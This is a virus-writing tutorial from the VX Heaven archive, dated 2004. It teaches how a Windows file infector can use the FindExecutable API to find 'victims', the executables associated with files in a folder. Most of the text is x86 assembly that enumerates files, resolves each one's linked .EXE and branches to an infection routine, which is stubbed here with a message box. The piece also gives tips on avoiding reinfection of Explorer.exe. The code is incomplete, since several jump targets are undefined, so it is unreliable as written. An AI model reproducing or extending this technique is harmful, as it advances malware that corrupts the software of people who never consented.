VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Find Victims with FindExecutable API

Ready Rangers Liberation Front [5]
July 2004

[Back to index] [Comments]


With FindExecutable you can get a full path of a application that manages a file type!

As Examples:

Now find with FindExecutable API the linked application, and you have new victims to infect. Don't know how to explain, see the API Info and the Example Code for better understanding.

API Info (from Win32 SDK Reference)

The FindExecutable function retrieves the name and handle to the executable (.EXE) file associated with the specified filename.

HINSTANCE FindExecutable(
    LPCTSTR lpFile,	// pointer to string for filename
    LPCTSTR lpDirectory,// pointer to string for default directory
    LPTSTR lpResult 	// pointer to buffer for string for executable file on return



Pointer to a null-terminated string specifying a filename. This can be a document or executable file.


Pointer to a null-terminated string specifying the default directory.


Pointer to a buffer to receive the filename when the function returns. This filename is a null-terminated string specifying the executable file started when an "open" association is run on the file specified in the lpFile parameter.

Return Values

If the function succeeds, the return value is greater than 32.

If the function fails, the return value is less than or equal to 32. The following table lists the possible error values:

0The system is out of memory or resources.
31There is no association for the specified file type.
ERROR_FILE_NOT_FOUNDThe specified file was not found.
ERROR_PATH_NOT_FOUNDThe specified path was not found.
ERROR_BAD_FORMATThe .EXE file is invalid (non-Win32 .EXE or error in .EXE image).


When FindExecutable returns, the lpResult parameter may contain the path to the DDE server started if no server responds to a request to initiate a DDE conversation.

Example Code

.model flat

        extrn MessageBoxA       :PROC
        extrn FindExecutableA   :PROC                           ;to get the linked application
        extrn FindFirstFileA    :PROC                           ;search for *.* -> all files
        extrn FindNextFileA     :PROC
        extrn ExitProcess       :PROC


        FILETIME                STRUC
        FT_dwLowDateTime        dd ?
        FT_dwHighDateTime       dd ?
        FILETIME                ENDS

        WIN32_FIND_DATA          label    byte
         WFD_dwFileAttributes    dd       ?
         WFD_ftCreationTime      FILETIME ?
         WFD_ftLastAccessTime    FILETIME ?
         WFD_ftLastWriteTime     FILETIME ?
         WFD_nFileSizeHigh       dd       ?
         WFD_nFileSizeLow        dd       ?
         WFD_dwReserved0         dd       ?
         WFD_dwReserved1         dd       ?
         WFD_szFileName          db       260d dup (?)
         WFD_szAlternateFileName db       13   dup (?)
         WFD_szAlternateEnding   db       03   dup (?)

        TargetFile              db 260 dup (?)  ;save here the full path of victim

        FileMask        db '*.*',0              ;all files
        FindHandle      dd 0                    ;save the find handle


        push    offset WIN32_FIND_DATA
        push    offset FileMask
        call    FindFirstFileA                  ;find first file in current folder
        mov     dword ptr [FindHandle],eax      ;save find handle

        test    eax,eax                         ;no more filez, exit
        jz      Ende

        push    offset TargetFile               ;save here full path of victim
        push    0                               ;current directory
        push    offset WFD_szFileName           ;file to get linked application
        call    FindExecutableA

        cmp     eax, 32d                        ;if <32 there is any error
        jb      FindNextPhile                                   ;find next file

        mov     esi,offset TargetFile
        call    GetPoint                        ;get point to check extension
        inc     esi

        cmp     byte ptr [esi],'E'              ;check if linked application
        jne     CheckAgain                      ;is a exe
        inc     esi                             ;maybe it's linked to .BAT or .PIF
        cmp     byte ptr [esi],'X'
        jne     CheckAgain
        inc     esi
        cmp     byte ptr [esi],'E'
        je      InfectFile                      ;if .EXE infect it

        mov     esi,offset TargetFile
        call    GetPoint
        inc     esi

        cmp     byte ptr [esi],'e'              ;check for .exe
        jne     FindNextPhile
        inc     esi
        cmp     byte ptr [esi],'x'
        jne     FindNextPhile
        inc     esi
        cmp     byte ptr [esi],'e'
        jne     FindNextPhile                   ;if no .exe find next file

        push    0                               ;here the infection routine
        push    offset WFD_szFileName           ;but only a MessageBox to show
        push    offset TargetFile               ;that it works
        push    0                               ;full path of linked application
        call    MessageBoxA                     ;is now in "TargetFile"

FindNextPhile:                                  ;find next file
        push    offset WIN32_FIND_DATA
        push    dword ptr [FindHandle]          ;via find handle
        call    FindNextFileA
        jmp     FindNext                        ;do it again

        push    0
        call    ExitProcess                     ;exit

GetPoint:                                       ;i love this procedure ;)
        cmp     byte ptr [esi],'.'              ;scan string for "."
        jz      PointFound
        inc     esi
        jmp     GetPoint
ret                                             ;return

end start                                       ;the end...

The Results?

If it works how we want it, a new Victim is as string in "TargetFile". Like "C:\Windows\Notepad.exe" (without the "). But when you search with "*.*" you find also folders! But not a big problem, because folders are linked with "C:\Windows\Explorer.exe". If you don't want to infect it again and again only check "TargetFile" for "Explorer.exe".

Another good thing, if "*.*" founds a .EXE it returns the same string.


WFD_szFileName = C:\Tests\FindExecutableTest.exe
TargetFile     = C:\Tests\FindExecutableTest.exe


That's all about the API FindExecutable! Have fun with this and thx for reading! For any comment's please do a entry in my guestbook (, or mail me to: [email protected]

DiA (c)04 GermanY
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! aka